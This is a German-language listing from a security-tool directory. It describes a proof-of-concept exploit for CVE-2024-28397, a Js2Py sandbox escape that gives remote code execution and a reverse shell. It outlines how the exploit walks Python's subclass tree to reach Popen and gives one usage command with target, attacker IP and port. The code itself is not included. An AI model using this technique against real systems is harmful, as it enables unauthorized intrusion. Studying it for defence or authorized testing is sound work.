Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-28397-Js2Py-RCE — Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2024-28397, eine Schwachstelle in der js2py-Bibliothek, die einen Sandbox-Escape ermöglicht, um eine Remote-Code-Ausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2024-28397, eine Schwachstelle in der js2py-Bibliothek, die einen Sandbox-Escape ermöglicht, um eine Remote-Code-Ausführung zu erreichen.

Repository anzeigen
2vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-28397-Js2Py-RCE

Beschreibung

Dieses Repository enthält einen Python-basierten Proof of Concept (PoC) für CVE-2024-28397, eine Sandbox-Escape-Schwachstelle im Js2Py-JavaScript-Interpreter für Python. Wenn die Zielanwendung nicht vertrauenswürdigen JS-Code über Js2Py auswertet, kann ein Angreifer die Sandbox umgehen und beliebigen Python-Code ausführen. Dies kann genutzt werden, um Remote-Code-Ausführung (RCE) und eine Reverse Shell auf dem angreifbaren System zu erlangen.

Dieser Exploit wurde von Marven11’s CVE-2024-28397-js2py-Sandbox-Escape Projekt inspiriert.


Haftungsausschluss

Dieses Skript wird ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests bereitgestellt. Die unbefugte Nutzung dieses Skripts gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis haben, ist illegal und unethisch. Der Autor übernimmt keine Verantwortung für Missbrauch oder durch dieses Skript verursachte Schäden.


Über die Schwachstelle

  • CVE ID: CVE-2024-28397
  • Komponente: Js2Py Sandbox-Escape
  • Auswirkung: Uneingeschränkter Zugriff auf das Python-Objektmodell über __class__.__base__.__subclasses__, was zur Ausführung beliebigen Codes führt.
  • Angriffsvektor: Remote (über eine exponierte HTTP-Schnittstelle, die vom Benutzer kontrolliertes JavaScript auswertet)

Funktionen

  • Automatische Zustellung der Reverse-Shell-Payload über Python-RCE
  • Inline-Ausführung Base64-codierter Shell-Befehle
  • Eingebauter Reverse-Shell-Listener mit grundlegender PTY-Stabilisierung
  • Saubere Ausgabeformatierung
  • Leichtgewichtig und ohne Abhängigkeiten (außer requests)

Anforderungen

  • Python 3.x
  • requests-Modul (pip install requests)
  • Ein Linux-System (für /dev/tcp Reverse Shell)
  • Ein Ziel, das eine anfällige Implementierung von Js2Py ausführt

Verwendung

root@kitploit:~
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target: Die vollständige URL zum anfälligen Web-App-Endpunkt
  • --lhost: Ihre lokale IP-Adresse (für Reverse Shell verwendet)
  • --lport: Ihr lokaler Port zum Empfangen der Shell

Funktionsweise

  1. Das Skript bereitet eine Bash-Reverse-Shell vor, codiert sie in Base64 und injiziert sie in eine JavaScript-Payload.
  2. Die JS-Payload durchläuft den Python-Objektbaum mit __class__.__base__.__subclasses__(), um subprocess.Popen zu finden.
  3. Es verwendet Popen, um die Shell zu decodieren und auszuführen.
  4. Der Rechner des Angreifers empfängt die Reverse Shell und stabilisiert sie automatisch.
Tool herunterladen